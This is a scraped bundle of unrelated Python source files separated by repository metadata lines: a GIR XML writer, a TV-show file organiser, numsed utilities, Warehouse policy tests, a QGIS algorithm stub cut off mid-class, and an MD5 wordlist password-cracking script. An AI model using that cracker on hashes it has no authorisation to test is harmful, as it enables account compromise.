# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the
# Free Software Foundation, Inc., 59 Temple Place - Suite 330,
# Boston, MA 02111-1307, USA.
#
from __future__ import with_statement
from . import ast
from .xmlwriter import XMLWriter
# Bump this for *incompatible* changes to the .gir.
# Compatible changes we just make inline
COMPATIBLE_GIR_VERSION = '1.2'
class GIRWriter(XMLWriter):
def __init__(self, namespace, shlibs, includes, pkgs, c_includes):
super(GIRWriter, self).__init__()
self.write_comment(
'''This file was automatically generated from C sources - DO NOT EDIT!
To affect the contents of this file, edit the original C definitions,
and/or use gtk-doc annotations. ''')
self._write_repository(namespace, shlibs, includes, pkgs,
c_includes)
def _write_repository(self, namespace, shlibs, includes=None,
packages=None, c_includes=None):
if includes is None:
includes = frozenset()
if packages is None:
packages = frozenset()
if c_includes is None:
c_includes = frozenset()
attrs = [
('version', COMPATIBLE_GIR_VERSION),
('xmlns', 'http://www.gtk.org/introspection/core/1.0'),
('xmlns:c', 'http://www.gtk.org/introspection/c/1.0'),
('xmlns:glib', 'http://www.gtk.org/introspection/glib/1.0'),
]
with self.tagcontext('repository', attrs):
for include in sorted(includes):
self._write_include(include)
for pkg in sorted(set(packages)):
self._write_pkgconfig_pkg(pkg)
for c_include in sorted(set(c_includes)):
self._write_c_include(c_include)
self._namespace = namespace
self._write_namespace(namespace, shlibs)
self._namespace = None
def _write_include(self, include):
attrs = [('name', include.name), ('version', include.version)]
self.write_tag('include', attrs)
def _write_pkgconfig_pkg(self, package):
attrs = [('name', package)]
self.write_tag('package', attrs)
def _write_c_include(self, c_include):
attrs = [('name', c_include)]
self.write_tag('c:include', attrs)
def _write_namespace(self, namespace, shlibs):
attrs = [('name', namespace.name),
('version', namespace.version),
('shared-library', ','.join(shlibs)),
('c:identifier-prefixes', ','.join(namespace.identifier_prefixes)),
('c:symbol-prefixes', ','.join(namespace.symbol_prefixes))]
with self.tagcontext('namespace', attrs):
# We define a custom sorting function here because
# we want aliases to be first. They're a bit
# special because the typelib compiler expands them.
def nscmp(a, b):
if isinstance(a, ast.Alias):
if isinstance(b, ast.Alias):
return cmp(a.name, b.name)
else:
return -1
elif isinstance(b, ast.Alias):
return 1
else:
return cmp(a, b)
for node in sorted(namespace.itervalues(), cmp=nscmp):
self._write_node(node)
def _write_node(self, node):
if isinstance(node, ast.Function):
self._write_function(node)
elif isinstance(node, ast.Enum):
self._write_enum(node)
elif isinstance(node, ast.Bitfield):
self._write_bitfield(node)
elif isinstance(node, (ast.Class, ast.Interface)):
self._write_class(node)
elif isinstance(node, ast.Callback):
self._write_callback(node)
elif isinstance(node, ast.Record):
self._write_record(node)
elif isinstance(node, ast.Union):
self._write_union(node)
elif isinstance(node, ast.Boxed):
self._write_boxed(node)
elif isinstance(node, ast.Member):
# FIXME: atk_misc_instance singleton
pass
elif isinstance(node, ast.Alias):
self._write_alias(node)
elif isinstance(node, ast.Constant):
self._write_constant(node)
else:
print 'WRITER: Unhandled node', node
def _append_version(self, node, attrs):
if node.version:
attrs.append(('version', node.version))
def _write_generic(self, node):
for key, value in node.attributes:
self.write_tag('attribute', [('name', key), ('value', value)])
if hasattr(node, 'doc') and node.doc:
self.write_tag('doc', [('xml:whitespace', 'preserve')],
node.doc.strip())
def _append_node_generic(self, node, attrs):
if node.skip or not node.introspectable:
attrs.append(('introspectable', '0'))
if node.deprecated:
attrs.append(('deprecated', node.deprecated))
if node.deprecated_version:
attrs.append(('deprecated-version',
node.deprecated_version))
def _append_throws(self, func, attrs):
if func.throws:
attrs.append(('throws', '1'))
def _write_alias(self, alias):
attrs = [('name', alias.name)]
if alias.ctype is not None:
attrs.append(('c:type', alias.ctype))
self._append_node_generic(alias, attrs)
with self.tagcontext('alias', attrs):
self._write_generic(alias)
self._write_type_ref(alias.target)
def _write_callable(self, callable, tag_name, extra_attrs):
attrs = [('name', callable.name)]
attrs.extend(extra_attrs)
self._append_version(callable, attrs)
self._append_node_generic(callable, attrs)
self._append_throws(callable, attrs)
with self.tagcontext(tag_name, attrs):
self._write_generic(callable)
self._write_return_type(callable.retval, parent=callable)
self._write_parameters(callable, callable.parameters)
def _write_function(self, func, tag_name='function'):
attrs = []
if hasattr(func, 'symbol'):
attrs.append(('c:identifier', func.symbol))
if func.shadowed_by:
attrs.append(('shadowed-by', func.shadowed_by))
elif func.shadows:
attrs.append(('shadows', func.shadows))
self._write_callable(func, tag_name, attrs)
def _write_method(self, method):
self._write_function(method, tag_name='method')
def _write_static_method(self, method):
self._write_function(method, tag_name='function')
def _write_constructor(self, method):
self._write_function(method, tag_name='constructor')
def _write_return_type(self, return_, parent=None):
if not return_:
return
attrs = []
if return_.transfer:
attrs.append(('transfer-ownership', return_.transfer))
if return_.skip:
attrs.append(('skip', '1'))
with self.tagcontext('return-value', attrs):
self._write_generic(return_)
self._write_type(return_.type, function=parent)
def _write_parameters(self, parent, parameters):
if not parameters:
return
with self.tagcontext('parameters'):
for parameter in parameters:
self._write_parameter(parent, parameter)
def _write_parameter(self, parent, parameter):
attrs = []
if parameter.argname is not None:
attrs.append(('name', parameter.argname))
if (parameter.direction is not None) and (parameter.direction != 'in'):
attrs.append(('direction', parameter.direction))
attrs.append(('caller-allocates',
'1' if parameter.caller_allocates else '0'))
if parameter.transfer:
attrs.append(('transfer-ownership',
parameter.transfer))
if parameter.allow_none:
attrs.append(('allow-none', '1'))
if parameter.scope:
attrs.append(('scope', parameter.scope))
if parameter.closure_name is not None:
idx = parent.get_parameter_index(parameter.closure_name)
attrs.append(('closure', '%d' % (idx, )))
if parameter.destroy_name is not None:
idx = parent.get_parameter_index(parameter.destroy_name)
attrs.append(('destroy', '%d' % (idx, )))
if parameter.skip:
attrs.append(('skip', '1'))
with self.tagcontext('parameter', attrs):
self._write_generic(parameter)
self._write_type(parameter.type, function=parent)
def _type_to_name(self, typeval):
if not typeval.resolved:
raise AssertionError("Caught unresolved type %r (ctype=%r)" % (typeval, typeval.ctype))
assert typeval.target_giname is not None
prefix = self._namespace.name + '.'
if typeval.target_giname.startswith(prefix):
return typeval.target_giname[len(prefix):]
return typeval.target_giname
def _write_type_ref(self, ntype):
""" Like _write_type, but only writes the type name rather than the full details """
assert isinstance(ntype, ast.Type), ntype
attrs = []
if ntype.ctype:
attrs.append(('c:type', ntype.ctype))
if isinstance(ntype, ast.Array):
if ntype.array_type != ast.Array.C:
attrs.insert(0, ('name', ntype.array_type))
elif isinstance(ntype, ast.List):
if ntype.name:
attrs.insert(0, ('name', ntype.name))
elif isinstance(ntype, ast.Map):
attrs.insert(0, ('name', 'GLib.HashTable'))
else:
if ntype.target_giname:
attrs.insert(0, ('name', self._type_to_name(ntype)))
elif ntype.target_fundamental:
attrs.insert(0, ('name', ntype.target_fundamental))
self.write_tag('type', attrs)
def _write_type(self, ntype, relation=None, function=None):
assert isinstance(ntype, ast.Type), ntype
attrs = []
if ntype.ctype:
attrs.append(('c:type', ntype.ctype))
if isinstance(ntype, ast.Varargs):
with self.tagcontext('varargs', []):
pass
elif isinstance(ntype, ast.Array):
if ntype.array_type != ast.Array.C:
attrs.insert(0, ('name', ntype.array_type))
# we insert an explicit 'zero-terminated' attribute
# when it is false, or when it would not be implied
# by the absence of length and fixed-size
if not ntype.zeroterminated:
attrs.insert(0, ('zero-terminated', '0'))
elif (ntype.zeroterminated
and (ntype.size is not None or ntype.length_param_name is not None)):
attrs.insert(0, ('zero-terminated', '1'))
if ntype.size is not None:
attrs.append(('fixed-size', '%d' % (ntype.size, )))
if ntype.length_param_name is not None:
assert function
attrs.insert(0, ('length', '%d'
% (function.get_parameter_index(ntype.length_param_name, ))))
with self.tagcontext('array', attrs):
self._write_type(ntype.element_type)
elif isinstance(ntype, ast.List):
if ntype.name:
attrs.insert(0, ('name', ntype.name))
with self.tagcontext('type', attrs):
self._write_type(ntype.element_type)
elif isinstance(ntype, ast.Map):
attrs.insert(0, ('name', 'GLib.HashTable'))
with self.tagcontext('type', attrs):
self._write_type(ntype.key_type)
self._write_type(ntype.value_type)
else:
# REWRITEFIXME - enable this for 1.2
if ntype.target_giname:
attrs.insert(0, ('name', self._type_to_name(ntype)))
elif ntype.target_fundamental:
# attrs = [('fundamental', ntype.target_fundamental)]
attrs.insert(0, ('name', ntype.target_fundamental))
elif ntype.target_foreign:
attrs.insert(0, ('foreign', '1'))
self.write_tag('type', attrs)
def _append_registered(self, node, attrs):
assert isinstance(node, ast.Registered)
if node.get_type:
attrs.extend([('glib:type-name', node.gtype_name),
('glib:get-type', node.get_type)])
def _write_enum(self, enum):
attrs = [('name', enum.name)]
self._append_version(enum, attrs)
self._append_node_generic(enum, attrs)
self._append_registered(enum, attrs)
attrs.append(('c:type', enum.ctype))
if enum.error_quark:
attrs.append(('glib:error-quark', enum.error_quark))
with self.tagcontext('enumeration', attrs):
self._write_generic(enum)
for member in enum.members:
self._write_member(member)
def _write_bitfield(self, bitfield):
attrs = [('name', bitfield.name)]
self._append_version(bitfield, attrs)
self._append_node_generic(bitfield, attrs)
self._append_registered(bitfield, attrs)
attrs.append(('c:type', bitfield.ctype))
with self.tagcontext('bitfield', attrs):
self._write_generic(bitfield)
for member in bitfield.members:
self._write_member(member)
def _write_member(self, member):
attrs = [('name', member.name),
('value', str(member.value)),
('c:identifier', member.symbol)]
if member.nick is not None:
attrs.append(('glib:nick', member.nick))
self.write_tag('member', attrs)
def _write_constant(self, constant):
attrs = [('name', constant.name), ('value', constant.value)]
with self.tagcontext('constant', attrs):
self._write_type(constant.value_type)
def _write_class(self, node):
attrs = [('name', node.name),
('c:symbol-prefix', node.c_symbol_prefix),
('c:type', node.ctype)]
self._append_version(node, attrs)
self._append_node_generic(node, attrs)
if isinstance(node, ast.Class):
tag_name = 'class'
if node.parent is not None:
attrs.append(('parent',
self._type_to_name(node.parent)))
if node.is_abstract:
attrs.append(('abstract', '1'))
else:
assert isinstance(node, ast.Interface)
tag_name = 'interface'
attrs.append(('glib:type-name', node.gtype_name))
if node.get_type is not None:
attrs.append(('glib:get-type', node.get_type))
if node.glib_type_struct is not None:
attrs.append(('glib:type-struct',
self._type_to_name(node.glib_type_struct)))
if isinstance(node, ast.Class):
if node.fundamental:
attrs.append(('glib:fundamental', '1'))
if node.ref_func:
attrs.append(('glib:ref-func', node.ref_func))
if node.unref_func:
attrs.append(('glib:unref-func', node.unref_func))
if node.set_value_func:
attrs.append(('glib:set-value-func', node.set_value_func))
if node.get_value_func:
attrs.append(('glib:get-value-func', node.get_value_func))
with self.tagcontext(tag_name, attrs):
self._write_generic(node)
if isinstance(node, ast.Class):
for iface in sorted(node.interfaces):
self.write_tag('implements',
[('name', self._type_to_name(iface))])
if isinstance(node, ast.Interface):
for iface in sorted(node.prerequisites):
self.write_tag('prerequisite',
[('name', self._type_to_name(iface))])
if isinstance(node, ast.Class):
for method in sorted(node.constructors):
self._write_constructor(method)
if isinstance(node, (ast.Class, ast.Interface)):
for method in sorted(node.static_methods):
self._write_static_method(method)
for vfunc in sorted(node.virtual_methods):
self._write_vfunc(vfunc)
for method in sorted(node.methods):
self._write_method(method)
for prop in sorted(node.properties):
self._write_property(prop)
for field in node.fields:
self._write_field(field)
for signal in sorted(node.signals):
self._write_signal(signal)
def _write_boxed(self, boxed):
attrs = [('glib:name', boxed.name)]
if boxed.c_symbol_prefix is not None:
attrs.append(('c:symbol-prefix', boxed.c_symbol_prefix))
self._append_registered(boxed, attrs)
with self.tagcontext('glib:boxed', attrs):
self._write_generic(boxed)
for method in sorted(boxed.constructors):
self._write_constructor(method)
for method in sorted(boxed.methods):
self._write_method(method)
for method in sorted(boxed.static_methods):
self._write_static_method(method)
def _write_property(self, prop):
attrs = [('name', prop.name)]
self._append_version(prop, attrs)
self._append_node_generic(prop, attrs)
# Properties are assumed to be readable (see also generate.c)
if not prop.readable:
attrs.append(('readable', '0'))
if prop.writable:
attrs.append(('writable', '1'))
if prop.construct:
attrs.append(('construct', '1'))
if prop.construct_only:
attrs.append(('construct-only', '1'))
if prop.transfer:
attrs.append(('transfer-ownership', prop.transfer))
with self.tagcontext('property', attrs):
self._write_generic(prop)
self._write_type(prop.type)
def _write_vfunc(self, vf):
attrs = []
if vf.invoker:
attrs.append(('invoker', vf.invoker))
self._write_callable(vf, 'virtual-method', attrs)
def _write_callback(self, callback):
attrs = []
if callback.namespace:
attrs.append(('c:type', callback.ctype or callback.c_name))
self._write_callable(callback, 'callback', attrs)
def _write_record(self, record, extra_attrs=[]):
is_gtype_struct = False
attrs = list(extra_attrs)
if record.name is not None:
attrs.append(('name', record.name))
if record.ctype is not None: # the record might be anonymous
attrs.append(('c:type', record.ctype))
if record.disguised:
attrs.append(('disguised', '1'))
if record.foreign:
attrs.append(('foreign', '1'))
if record.is_gtype_struct_for is not None:
is_gtype_struct = True
attrs.append(('glib:is-gtype-struct-for',
self._type_to_name(record.is_gtype_struct_for)))
self._append_version(record, attrs)
self._append_node_generic(record, attrs)
self._append_registered(record, attrs)
if record.c_symbol_prefix:
attrs.append(('c:symbol-prefix', record.c_symbol_prefix))
with self.tagcontext('record', attrs):
self._write_generic(record)
if record.fields:
for field in record.fields:
self._write_field(field, is_gtype_struct)
for method in sorted(record.constructors):
self._write_constructor(method)
for method in sorted(record.methods):
self._write_method(method)
for method in sorted(record.static_methods):
self._write_static_method(method)
def _write_union(self, union):
attrs = []
if union.name is not None:
attrs.append(('name', union.name))
if union.ctype is not None: # the union might be anonymous
attrs.append(('c:type', union.ctype))
self._append_version(union, attrs)
self._append_node_generic(union, attrs)
self._append_registered(union, attrs)
if union.c_symbol_prefix:
attrs.append(('c:symbol-prefix', union.c_symbol_prefix))
with self.tagcontext('union', attrs):
self._write_generic(union)
if union.fields:
for field in union.fields:
self._write_field(field)
for method in sorted(union.constructors):
self._write_constructor(method)
for method in sorted(union.methods):
self._write_method(method)
for method in sorted(union.static_methods):
self._write_static_method(method)
def _write_field(self, field, is_gtype_struct=False):
if field.anonymous_node:
if isinstance(field.anonymous_node, ast.Callback):
attrs = [('name', field.name)]
self._append_node_generic(field, attrs)
with self.tagcontext('field', attrs):
self._write_callback(field.anonymous_node)
elif isinstance(field.anonymous_node, ast.Record):
self._write_record(field.anonymous_node)
elif isinstance(field.anonymous_node, ast.Union):
self._write_union(field.anonymous_node)
else:
raise AssertionError("Unknown field anonymous: %r" \
% (field.anonymous_node, ))
else:
attrs = [('name', field.name)]
self._append_node_generic(field, attrs)
# Fields are assumed to be read-only
# (see also girparser.c and generate.c)
if not field.readable:
attrs.append(('readable', '0'))
if field.writable:
attrs.append(('writable', '1'))
if field.bits:
attrs.append(('bits', str(field.bits)))
if field.private:
attrs.append(('private', '1'))
with self.tagcontext('field', attrs):
self._write_generic(field)
self._write_type(field.type)
def _write_signal(self, signal):
attrs = [('name', signal.name)]
self._append_version(signal, attrs)
self._append_node_generic(signal, attrs)
with self.tagcontext('glib:signal', attrs):
self._write_generic(signal)
self._write_return_type(signal.retval)
self._write_parameters(signal, signal.parameters)
|
gpl-2.0
| 7,605,723,460,842,861,000
| 41.477718
| 99
| 0.565883
| false
| 4.137153
| false
| false
| false
|
PlainStupid/PlainCleanUp
|
CleanUp/FinalSol.py
|
1
|
9335
|
import re
import os
import shutil
import sys
# Regexes are ordered from the most common to the least common
# file-name pattern.
regexShow = [
'''
# Matches with Show.S01E10.mp4
^ #Beginning of a string
(?P<ShowName>.+?) #Show name
[\.\_\-\s]+ #If it has dot, underscore or dash
(?:s\s*|season\s*) #Case if starts with s or season
(?P<SeasonNumber>\d+) #Show Season number
[. _-]*
(?:e\s*|episode\s*) #Case if starts with e or episode
(?P<EpisodeNumber>\d+) #Show episode number
[. _-]*
''',
'''
# Matches Show.Name -12x12.avi
^
(?P<ShowName>.+)
#Show name
[._-]+ # char between show name and season number
(?P<SeasonNumber>\d+)
#Season number
x #x between season and episode number
(?P<EpisodeNumber>\d+)
#Episode number
''',
'''
# Matches Show - [01x10].mp4
^
(?P<ShowName>.+)
\s*[-]*\s*\[
(?P<SeasonNumber>\d+) #Season number
x
(?P<EpisodeNumber>\d+)#Episode number
]
''',
'''
# Matches Show.Name.812.mp4
^
(?P<ShowName>.+?)
[. _-]+
(?P<SeasonNumber>\d{1,2}) #Season number
(?P<EpisodeNumber>\d{2}) #Episode number
''',
'''
# Matches with Show03e10.mp4
# eg. santi-dexterd07e10.hdrip.xvid
^(?P<ShowName>.{2,}) #Show name
(?P<SeasonNumber>\d.+) #Season number
(?:e|episode)(?P<EpisodeNumber>\d+) #Episode number
'''
]
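# Illustrative sketch (not part of the original script): how the first pattern
# above parses a sample file name; the file name used here is hypothetical.
def _demo_first_pattern(filename='Some.Show.S01E10.mp4'):
    match = re.compile(regexShow[0], re.IGNORECASE | re.MULTILINE | re.VERBOSE).match(filename)
    # For the sample name this yields ShowName='Some.Show',
    # SeasonNumber='01' and EpisodeNumber='10'.
    return match.groupdict() if match else None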
ignoreRegex = {'sample': '(^|[\W_])(sample\d*)[\W_]',
'photos': '^AlbumArt.+{.+}'}
videoextensions = ['avi', 'mp4', 'mkv', 'mpg', 'mp3',
'm4v', 'divx', 'rm', 'mpeg', 'wmv',
'ogm', 'iso', 'img', 'm2ts', 'ts',
'flv', 'f4v', 'mov', 'rmvb', 'vob',
'dvr-ms', 'wtv', 'ogv', '3gp', 'xvid'
]
subExtensions = ['srt', 'idx', 'sub']
otherExtension = ['nfo']
photoExtensions = ['jpg', 'jpeg', 'bmp', 'tbn']
junkFiles = ['.torrent', '.dat', '.url', '.txt', '.sfv']
showsFolder = 'Shows'
def cleanUp(dirty_dir, clean_dir):
# Absolute path to the dirty directory
dirtyDir = os.path.abspath(dirty_dir)
# Absolute path to the clean directory
cleanDir = os.path.abspath(clean_dir)
theShowDir = os.path.join(cleanDir, showsFolder)
for subdir, dirs, files in os.walk(dirtyDir):
# Scan every file in dirtyDir
for file in files:
# Get the file name and its extension
file_name, file_extension = os.path.splitext(file)
# Absolute path to the old file
oldFile = os.path.abspath(os.path.join(subdir, file))
# Try every regular expression, from the most common pattern to the least common one
for y in regexShow:
# First we compile the regular expression
showReg = re.compile(y, re.IGNORECASE | re.MULTILINE | re.VERBOSE)
# Get the show name if it exists
showName = showReg.match(file)
# We don't want sample files so we check if the current file is
# a sample file
isSample = re.search(ignoreRegex['sample'], file)
# Check whether the file is an album-art photo that should be ignored
ignPhotos = re.match(ignoreRegex['photos'], file)
# Check the shows files based on their extension and if they are not
# a sample file
if showName and not isSample and allowedExt(file_extension):
mkFullShowDir(theShowDir, showName)
moveTvFile(theShowDir, oldFile, showName)
break
# Check the photos since we don't want all photos, eg. AlbumArt_....
if showName and not isSample and not ignPhotos and file_extension[1:] in photoExtensions:
mkFullShowDir(theShowDir, showName)
moveTvFile(theShowDir, oldFile, showName)
break
# Remove the file if it has junk extension
if file_extension in junkFiles:
if os.path.exists(oldFile):
os.remove(oldFile)
# Go and clean the dirty folder, that is remove all empty folders
cleanEmptyDirtyDir(dirtyDir)
# Give the user a satisfying word
print('Done')
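# Illustrative note (not part of the original script): after cleanUp() runs, a
# recognised episode ends up at
#   <clean_dir>/Shows/<Show Name>/Season NN/<original file name>
# which mirrors the paths built by mkFullShowDir() and moveTvFile() below.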
def cleanEmptyDirtyDir(dirtyDir):
# get number of subdirectories
curr = len([x[0] for x in os.walk(dirtyDir)])
while True:
# remove all empty dirs
remove_all_empty_dirs(dirtyDir)
temp = len([x[0] for x in os.walk(dirtyDir)])
# if no empty directory was found we stop
if curr == temp:
break
curr = temp
def allowedExt(file_extension):
"""
:argument File extension
:returns Returns true if the file extension is in current extensions groups
"""
# Get the file extension without the dot
fileExt = file_extension[1:]
# Return True if it exist in extensions groups
return (fileExt in subExtensions or
fileExt in videoextensions or
fileExt in otherExtension)
def cleanShowName(file):
"""
:argument Original file name(string)
:returns Returns clean show name, eg. Show Name
"""
return re.sub('\.|-|_', ' ', file.group('ShowName')).strip().title()
def dottedShowName(file):
"""
:argument Original file name(string)
:returns Returns dotted show name, eg. Show.Name
"""
return re.sub('-|_|\s', '.', file.group('ShowName')).strip().title()
def mkFullMovieDir(fullDir, newfile):
movieName = newfile.group('MovieName')
movieYear = newfile.group('MovieYear')
pathName = '%s (%s)' % (movieName, movieYear)
newPath = os.path.join(fullDir, pathName)
if not os.path.isdir(newPath):
if os.path.isfile(newPath):
raise OSError('A file with the same name as the folder already exists: %s' % (newPath))
else:
try:
os.makedirs(newPath)
pass
except:
raise OSError('Something went wrong creating the folders: %s' % (newPath))
pass
def moveTvFile(clean_dir, oldFile, newFile):
"""
:argument Path to the clean directory, old file including its path, regex file
:returns Silently returns if exist or has been created, else raise error
"""
# Get the clean show name - Show Name
showName = cleanShowName(newFile)
# And the season number
seasonNumber = int(newFile.group('SeasonNumber'))
# String with clean Show directory - ./clean/Show Name/
showDirectory = os.path.join(clean_dir,showName)
# Season string with leading zero - Season 03
formatedSeason = 'Season %02d' %(seasonNumber)
# Full path to the newly created clean path - ./clean/Show Name/Season ##/
fullDir = os.path.join(showDirectory,formatedSeason)
# Get the base name of the old file - ./dirty/Seasn9/TheFileS##E##.avi -> TheFileS##E##.avi
oldFileName = os.path.basename(oldFile)
# New file path to the clean folder - ./clean/Show Name/Season ##/TheFile.avi
newFilePath = os.path.join(fullDir, oldFileName)
# If it doesn't exist we rename it, otherwise just notify user about it
if not os.path.isfile(newFilePath):
shutil.move(oldFile, newFilePath)
else:
print('A file with this name already exists at the destination:', oldFile)
pass
def mkFullShowDir(clean_dir, file):
"""
:argument Original file name(string)
:returns Silently returns if exist or has been created, else raise error
"""
# Get the clean show name - Show Name
showName = cleanShowName(file)
# And the season number
seasonNumber = int(file.group('SeasonNumber'))
# String with clean Show directory - ./clean/Show Name/
showDirectory = os.path.join(clean_dir,showName)
# Season string with leading zero - Season 03
formatedSeason = 'Season %02d' %(seasonNumber)
# Full path to the newly created clean path - ./clean/Show Name/Season ##/
fullDir = os.path.join(showDirectory,formatedSeason)
# Create the folder if it doesn't exist, raise error if there is a file
# with the same name
if not os.path.isdir(fullDir):
if os.path.isfile(fullDir):
raise OSError('A file with the same name as the folder already exists: %s' % (fullDir))
else:
try:
os.makedirs(fullDir)
pass
except:
raise OSError('Something went wrong creating the folders: %s' % (fullDir))
pass
def remove_all_empty_dirs(path_to_curr_dir):
"""
:argument Path to dirty directory
:returns Nothing
"""
# check if path exists
if not os.path.isdir(path_to_curr_dir):
return
# get all items in the current directory
items = os.listdir(path_to_curr_dir)
# if directory is not empty, we call recursively for each item
if items:
for item in items:
abs_path = os.path.join(path_to_curr_dir, item)
remove_all_empty_dirs(abs_path)
# Empty folder removed
else:
os.rmdir(path_to_curr_dir)
if __name__ == "__main__":
cleanUp(sys.argv[1], sys.argv[2])
|
mit
| 6,587,270,393,259,099,000
| 30.12
| 105
| 0.582217
| false
| 3.830529
| false
| false
| false
|
GillesArcas/numsed
|
numsed/common.py
|
1
|
2941
|
from __future__ import print_function
import sys
import os
import subprocess
import time
try:
from StringIO import StringIO # Python2
except ImportError:
from io import StringIO # Python3
PY2 = sys.version_info < (3,)
PY3 = sys.version_info > (3,)
TMP_SED = 'tmp.sed'
TMP_INPUT = 'tmp.input'
TMP_PY = 'tmp.py'
class NumsedConversion:
def __init__(self, source, transformation):
self.source = source
self.transformation = transformation
def trace(self):
return ''
def run(self, verbose=True):
return ''
def coverage(self):
return 'Coverage not implemented for current conversion.'
class ListStream:
def __enter__(self):
self.result = StringIO()
sys.stdout = self.result
return self
def __exit__(self, ext_type, exc_value, traceback):
sys.stdout = sys.__stdout__
def stringlist(self):
return self.result.getvalue().splitlines()
def singlestring(self):
return self.result.getvalue()
def run(cmd, echo=True):
try:
p = subprocess.Popen(cmd.split(),
#shell=True,
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT)
except:
print('Unable to start', cmd)
exit(1)
res = []
while True:
line = p.stdout.readline()
line = line.decode('ascii') # py3
if line == '':
break
else:
line = line.rstrip('\n\r')
res.append(line)
if echo:
print(line)
return '\n'.join(res)
def testlines(name):
'''
yield each test in a test suite
'''
lines = []
result = None
dest = lines
with open(name) as f:
for line in f:
if line.startswith('#') and '===' in line:
result = []
dest = result
elif line.startswith('#') and '---' in line:
yield lines, result
lines = []
result = None
dest = lines
else:
dest.append(line)
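# Illustrative note (not part of the original module): testlines() expects files
# laid out as below, where a '# ===' line starts the expected output of a test
# and a '# ---' line ends it (the statements shown are hypothetical):
#   print(1 + 1)
#   # === expected ===
#   2
#   # --- end of test ---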
def list_compare(tag1, tag2, list1, list2):
# make sure both lists have same length
maxlen = max(len(list1), len(list2))
list1.extend([''] * (maxlen - len(list1)))
list2.extend([''] * (maxlen - len(list2)))
# with open('list1.txt', 'w') as f:
# for line in list1:
# print>>f, line
# with open('list2.txt', 'w') as f:
# for line in list2:
# print>>f, line
diff = list()
res = True
for i, (x, y) in enumerate(zip(list1, list2)):
if x != y:
diff.append('line %s %d: %s' % (tag1, i + 1, x))
diff.append('line %s %d: %s' % (tag2, i + 1, y))
res = False
return res, diff
def hasextension(filename, *ext):
return os.path.splitext(filename)[1].lower() in [_.lower() for _ in ext]
|
mit
| 6,023,549,609,253,550,000
| 23.923729
| 76
| 0.524651
| false
| 3.76087
| false
| false
| false
|
dstufft/warehouse
|
tests/unit/test_policy.py
|
1
|
2168
|
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import pretend
from warehouse import policy
def test_markdown_view(tmpdir):
tmpdir = str(tmpdir)
filename = "test.md"
with open(os.path.join(tmpdir, filename), "w", encoding="utf8") as fp:
fp.write("# This is my Test\n\nIt is a great test.\n")
view = policy.markdown_view_factory(filename=filename)
request = pretend.stub(registry=pretend.stub(settings={"policy.directory": tmpdir}))
result = view(request)
assert result == {
"title": "This is my Test",
"html": "<h1>This is my Test</h1>\n<p>It is a great test.</p>\n",
}
def test_add_policy_view(monkeypatch):
md_view = pretend.stub()
markdown_view_factory = pretend.call_recorder(lambda filename: md_view)
monkeypatch.setattr(policy, "markdown_view_factory", markdown_view_factory)
config = pretend.stub(
add_route=pretend.call_recorder(lambda *a, **kw: None),
add_view=pretend.call_recorder(lambda *a, **kw: None),
)
policy.add_policy_view(config, "my-policy", "mine.md")
assert config.add_route.calls == [
pretend.call("policy.my-policy", "/policy/my-policy/")
]
assert config.add_view.calls == [
pretend.call(md_view, route_name="policy.my-policy", renderer="policy.html")
]
assert markdown_view_factory.calls == [pretend.call(filename="mine.md")]
def test_includeme():
config = pretend.stub(add_directive=pretend.call_recorder(lambda *a, **kw: None))
policy.includeme(config)
assert config.add_directive.calls == [
pretend.call("add_policy", policy.add_policy_view, action_wrap=False)
]
|
apache-2.0
| -2,289,942,341,886,902,800
| 31.358209
| 88
| 0.683118
| false
| 3.554098
| true
| false
| false
|
knightmare2600/d4rkc0de
|
encryption/md5word.py
|
1
|
1132
|
#!/usr/bin/python
#Uses all wordlists in a dir to crack a hash.
#
#www.darkc0de.com
#d3hydr8[at]gmail[dot]com
import md5, sys, os, time
def getwords(wordlist):
try:
file = open(wordlist, "r")
words = file.readlines()
file.close()
except(IOError),msg:
words = ""
print "Error:",msg
pass
return words
def timer():
now = time.localtime(time.time())
return time.asctime(now)
if len(sys.argv) != 3:
print "Usage: ./md5word.py <hash> <wordlist dir>"
sys.exit(1)
pw = sys.argv[1]
wordlists = os.listdir(sys.argv[2])
print "\n d3hydr8[at]gmail[dot]com md5word v1.0"
print "-----------------------------------------"
print "\n[+] Hash:",pw
print "[+] Wordlists Loaded:",len(wordlists)
print "[+] Started:",timer(),"\n"
for lst in wordlists:
words = getwords(os.path.join(sys.argv[2],lst))
print "[+] List:",lst," Length:",len(words),"loaded"
for word in words:
hash = md5.new(word[:-1]).hexdigest()
if pw == hash:
print "\n[+] Found Password:",os.path.join(sys.argv[2],lst)
print "[!] Password is:",word
print "\n[+] Done:",timer()
sys.exit(1)
print "\n[+] Done:",timer()
|
gpl-2.0
| 3,432,820,828,723,467,000
| 19.581818
| 62
| 0.605124
| false
| 2.584475
| false
| false
| false
|
gioman/QGIS
|
python/plugins/processing/algs/qgis/SinglePartsToMultiparts.py
|
1
|
4039
|
# -*- coding: utf-8 -*-
"""
***************************************************************************
SinglePartsToMultiparts.py
---------------------
Date : August 2012
Copyright : (C) 2012 by Victor Olaya
Email : volayaf at gmail dot com
***************************************************************************
* *
* This program is free software; you can redistribute it and/or modify *
* it under the terms of the GNU General Public License as published by *
* the Free Software Foundation; either version 2 of the License, or *
* (at your option) any later version. *
* *
***************************************************************************
"""
from builtins import str
__author__ = 'Victor Olaya'
__date__ = 'August 2012'
__copyright__ = '(C) 2012, Victor Olaya'
# This will get replaced with a git SHA1 when you do a git archive
__revision__ = '$Format:%H$'
import os
from qgis.PyQt.QtGui import QIcon
from qgis.core import QgsFeature, QgsGeometry, QgsWkbTypes, QgsProcessingUtils, NULL
from processing.core.GeoAlgorithm import GeoAlgorithm
from processing.core.parameters import ParameterVector
from processing.core.parameters import ParameterTableField
from processing.core.outputs import OutputVector
pluginPath = os.path.split(os.path.split(os.path.dirname(__file__))[0])[0]
class SinglePartsToMultiparts(GeoAlgorithm):
INPUT = 'INPUT'
FIELD = 'FIELD'
OUTPUT = 'OUTPUT'
def icon(self):
return QIcon(os.path.join(pluginPath, 'images', 'ftools', 'single_to_multi.png'))
def group(self):
return self.tr('Vector geometry tools')
def name(self):
return 'singlepartstomultipart'
def displayName(self):
return self.tr('Singleparts to multipart')
